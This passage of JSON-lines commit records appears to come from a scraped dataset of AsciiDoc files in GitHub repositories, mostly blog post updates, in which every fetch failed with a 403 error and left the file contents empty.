'https:\/\/github.com\/semarium\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02ba80827be03b7c470a719267638e4ba2cfb66b","subject":"Update 2015-11-16-Package-Nuget-pour-Ninject.adoc","message":"Update 2015-11-16-Package-Nuget-pour-Ninject.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-11-16-Package-Nuget-pour-Ninject.adoc","new_file":"_posts\/2015-11-16-Package-Nuget-pour-Ninject.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08107f5e48f862b2d7e31aafbcb5b861b46d257d","subject":"Delete the file at '_posts\/2017-05-08-Static-Translations-Bundle.adoc'","message":"Delete the file at '_posts\/2017-05-08-Static-Translations-Bundle.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-08-Static-Translations-Bundle.adoc","new_file":"_posts\/2017-05-08-Static-Translations-Bundle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"392ab1fd66689695035101b897fced8e67c8b402","subject":"Update 2017-07-21-Learning-to-reconstruction.adoc","message":"Update 2017-07-21-Learning-to-reconstruction.adoc","repos":"adler-j\/adler-j.github.io,adler-j\/adler-j.github.io","old_file":"_posts\/2017-07-21-Learning-to-reconstruction.adoc","new_file":"_posts\/2017-07-21-Learning-to-reconstruction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adler-j\/adler-j.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"214092fc013894dbfd5ce5cd68b5161e198cb025","subject":"Update 2015-08-28-How-to-Build-a-High-Performance-Autonomous-Mapping-Drone-From-Scratch.adoc","message":"Update 2015-08-28-How-to-Build-a-High-Performance-Autonomous-Mapping-Drone-From-Scratch.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-08-28-How-to-Build-a-High-Performance-Autonomous-Mapping-Drone-From-Scratch.adoc","new_file":"_posts\/2015-08-28-How-to-Build-a-High-Performance-Autonomous-Mapping-Drone-From-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e072ea084a27df729d1b94c0bec2d45fb1e4d26f","subject":"doc: implimenters: fix spelling","message":"doc: implimenters: fix spelling\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"mike-holmes-linaro\/odp,dkrot\/odp,nmorey\/odp,dkrot\/odp,dkrot\/odp,erachmi\/odp,mike-holmes-linaro\/odp,nmorey\/odp,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,nmorey\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,dkrot\/odp","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"bd4fc217a4a5606e2a56b169866a856d1ee434d4","subject":"y2b create post 4 Unique Gadgets You Didn't Know Existed...","message":"y2b create post 4 Unique Gadgets You Didn't Know Existed...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-30-4%20Unique%20Gadgets%20You%20Didn't%20Know%20Existed....adoc","new_file":"_posts\/2017-12-30-4%20Unique%20Gadgets%20You%20Didn't%20Know%20Existed....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8279780dbb5e8fecacdecb61cbe8f77f05120527","subject":"Updage plan","message":"Updage plan\n","repos":"mdenchev\/mui","old_file":"plan.adoc","new_file":"plan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdenchev\/mui.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e005aed0e897923bb41140d43dcea6c5ad0b8487","subject":"added main ood file","message":"added main ood file\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"OOD.adoc","new_file":"OOD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"f79bf48d80d9b1ae31869f39ed0fb1f0a747eb42","subject":"Update 2017-04-13-aaa.adoc","message":"Update 2017-04-13-aaa.adoc","repos":"s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io","old_file":"_posts\/2017-04-13-aaa.adoc","new_file":"_posts\/2017-04-13-aaa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/s-f-ek971\/s-f-ek971.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97d4994f2e0e77fb51dae36cf835e8f05d4b545a","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f60160207939210aaef7019f4edfb98cab91b7c0","subject":"Update 2016-12-14-The-Story-CS-Chapter-NIE.adoc","message":"Update 2016-12-14-The-Story-CS-Chapter-NIE.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-12-14-The-Story-CS-Chapter-NIE.adoc","new_file":"_posts\/2016-12-14-The-Story-CS-Chapter-NIE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d576fb1c3b504c0c96e46fc1ff0f740a6c99f4","subject":"Update 2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","message":"Update 2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","new_file":"_posts\/2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89484e1bcd5e2425a2ff7eff6c73e3fafbe93d5d","subject":"Update 2015-01-01-App-help-page.adoc","message":"Update 2015-01-01-App-help-page.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2015-01-01-App-help-page.adoc","new_file":"_posts\/2015-01-01-App-help-page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7e53bc57a119a59049b1ee15b89239e01217787","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9096158dbb93c6440afb883acec3f91b4f047c4b","subject":"Update 2015-02-24-new-post.adoc","message":"Update 2015-02-24-new-post.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-new-post.adoc","new_file":"_posts\/2015-02-24-new-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4eb9367fbeb900398cb29890d30c82ed1013e527","subject":"Update 2016-02-02-CONCEPTS.adoc","message":"Update 2016-02-02-CONCEPTS.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"199b29b74df1d130280853329ff64d471fc43fb3","subject":"Update 2017-06-08-shortage.adoc","message":"Update 2017-06-08-shortage.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-08-shortage.adoc","new_file":"_posts\/2017-06-08-shortage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5050a27fbae887135c8325a496db7b728096a3b7","subject":"Update 2015-11-16-Episode-32-Zen-and-the-Art-of-Digital-Pinball.adoc","message":"Update 2015-11-16-Episode-32-Zen-and-the-Art-of-Digital-Pinball.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-16-Episode-32-Zen-and-the-Art-of-Digital-Pinball.adoc","new_file":"_posts\/2015-11-16-Episode-32-Zen-and-the-Art-of-Digital-Pinball.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2044d1039a375e94598bd65614848ce6d54ee194","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc54c2aa8788d147d981947427ca91a3fade9749","subject":"Fixed floating ip description in README","message":"Fixed floating ip description in README\n\nFixes: #226\n","repos":"markllama\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f663f744027289441fd4faf191092c6a8c475c02","subject":"Add travis-ci build status","message":"Add travis-ci build status\n","repos":"cinhtau\/kaffee-pelion","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cinhtau\/kaffee-pelion.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c51681b52d98b5a9e9290583c8a42244aa7a44f9","subject":"Add a basic README.adoc file","message":"Add a basic README.adoc file\n","repos":"wildfly\/wildfly-common","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly\/wildfly-common.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d0f6612231baa5ceef5753c2d7a77fc4115bc59","subject":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bb5adf52f4d9d4b8aab71bfa4221196c2ad3639","subject":"Update 2015-09-17-drupal_add_js-JavaScript.adoc","message":"Update 2015-09-17-drupal_add_js-JavaScript.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-09-17-drupal_add_js-JavaScript.adoc","new_file":"_posts\/2015-09-17-drupal_add_js-JavaScript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0a2b392cd3f8a75bdbe4425b6428efa560a7d6f","subject":"Blog Hawkular APM OpenTracing Javascript (#252)","message":"Blog Hawkular APM OpenTracing Javascript (#252)\n\n","repos":"pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/11\/16\/hawkular-apm-opentracing-js.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/11\/16\/hawkular-apm-opentracing-js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c6db7c99d9178a722145349ed5710f6d12332bb","subject":"y2b create post Nintendo On Your Phone!","message":"y2b create post Nintendo On Your Phone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-27-Nintendo-On-Your-Phone.adoc","new_file":"_posts\/2016-04-27-Nintendo-On-Your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"788b62d9a9b3a2a57bd5807b46cdbe5d873ddb5a","subject":"Update 2014-04-22-Commit-messages.adoc","message":"Update 2014-04-22-Commit-messages.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-04-22-Commit-messages.adoc","new_file":"_posts\/2014-04-22-Commit-messages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9c88eae6dde7b347ff30d3a23c0a4f35cb28bbf","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"433ce7b08ab1be11e7ea6006ac4fbf284cda91e8","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b609e45c55a9d520ed5c7f374d73ba30caf7958","subject":"Update 2017-11-17-Trying-to-keep-somewhat-productive-and-positive.adoc","message":"Update 2017-11-17-Trying-to-keep-somewhat-productive-and-positive.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-11-17-Trying-to-keep-somewhat-productive-and-positive.adoc","new_file":"_posts\/2017-11-17-Trying-to-keep-somewhat-productive-and-positive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fcda8f7034a55bc06c226cfcfd8e824930feba8","subject":"y2b create post Shure SRH750DJ Headphones Unboxing","message":"y2b create post Shure SRH750DJ Headphones Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-08-Shure-SRH750DJ-Headphones-Unboxing.adoc","new_file":"_posts\/2011-06-08-Shure-SRH750DJ-Headphones-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70cec12c53ac2fdae4a4ffea002361e1fdb7e76d","subject":"y2b create post Razer Blade Gaming Laptop Hands On","message":"y2b create post Razer Blade Gaming Laptop Hands On","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Razer-Blade-Gaming-Laptop-Hands-On.adoc","new_file":"_posts\/2012-01-12-Razer-Blade-Gaming-Laptop-Hands-On.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c94073e93fe0f3972cd0ebd3b5146fad34d80f64","subject":"Update 2015-11-20-Da-Dom-huck-sieht-etwas-anders-aus.adoc","message":"Update 2015-11-20-Da-Dom-huck-sieht-etwas-anders-aus.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-20-Da-Dom-huck-sieht-etwas-anders-aus.adoc","new_file":"_posts\/2015-11-20-Da-Dom-huck-sieht-etwas-anders-aus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ee2f41b5b50c3087806747626b11b4533ab5ac1","subject":"Publish 2015-5-10-uGUI.adoc","message":"Publish 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5eeb2e04b0366097d06173cdd4cbe108859685a8","subject":"6.0.0-beta2 Release Notes","message":"6.0.0-beta2 Release Notes\n","repos":"takezoe\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/appendix\/release-notes\/6.0.0-beta-2.adoc","new_file":"docs\/src\/reference\/asciidoc\/appendix\/release-notes\/6.0.0-beta-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elastic\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"366d48fc5a83fe37739ea4325962d908cdb827df","subject":"Update 2019-05-17-3-Learning-Representations-through-Causal-Invariance.adoc","message":"Update 2019-05-17-3-Learning-Representations-through-Causal-Invariance.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-05-17-3-Learning-Representations-through-Causal-Invariance.adoc","new_file":"_posts\/2019-05-17-3-Learning-Representations-through-Causal-Invariance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f908e3c8d09343922807b97929cded0d4b10587","subject":"use mysql repleace apache db","message":"use mysql repleace apache db\n","repos":"jbosschina\/openshift-cookbooks","old_file":"jboss\/fuse\/fuse-all-in-one.adoc","new_file":"jboss\/fuse\/fuse-all-in-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4c8ec1780b5d0ee991506c031749fb65bf80a10","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0504c01a16ad13edd6d4040cdd21ee1dd20bd2b","subject":"Update 2016-07-03-Rock-climbing-the-day-after.adoc","message":"Update 2016-07-03-Rock-climbing-the-day-after.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-03-Rock-climbing-the-day-after.adoc","new_file":"_posts\/2016-07-03-Rock-climbing-the-day-after.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1399d0ac2196113b8479d1ed34f6723b3685c86c","subject":"Update 2015-05-31-Schreiben-Basic.adoc","message":"Update 2015-05-31-Schreiben-Basic.adoc","repos":"teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io","old_file":"_posts\/2015-05-31-Schreiben-Basic.adoc","new_file":"_posts\/2015-05-31-Schreiben-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teilautohall\/teilautohall.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89a10cfd8591092d2b6eaca45a20390b4c192eb6","subject":"Update 2016-08-19-Hello-everybody.adoc","message":"Update 2016-08-19-Hello-everybody.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef5cacac24f7c9bd56d5b9bb3e6a858ee9b145c5","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fda94ef9a4a654e9db07b4d299e7a86a36c928b2","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46d5fe1bbf43f6f7c19045604ec50635d46695ef","subject":"Update 2015-09-13-Is-your-router-part-of-a-botnet.adoc","message":"Update 2015-09-13-Is-your-router-part-of-a-botnet.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2015-09-13-Is-your-router-part-of-a-botnet.adoc","new_file":"_posts\/2015-09-13-Is-your-router-part-of-a-botnet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b03c08370e7aefcff681b556526caf943fde1d21","subject":"Renamed '_posts\/2017-09-19-Adding-about-page-to-hubpressio.adoc' to '_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc'","message":"Renamed '_posts\/2017-09-19-Adding-about-page-to-hubpressio.adoc' to 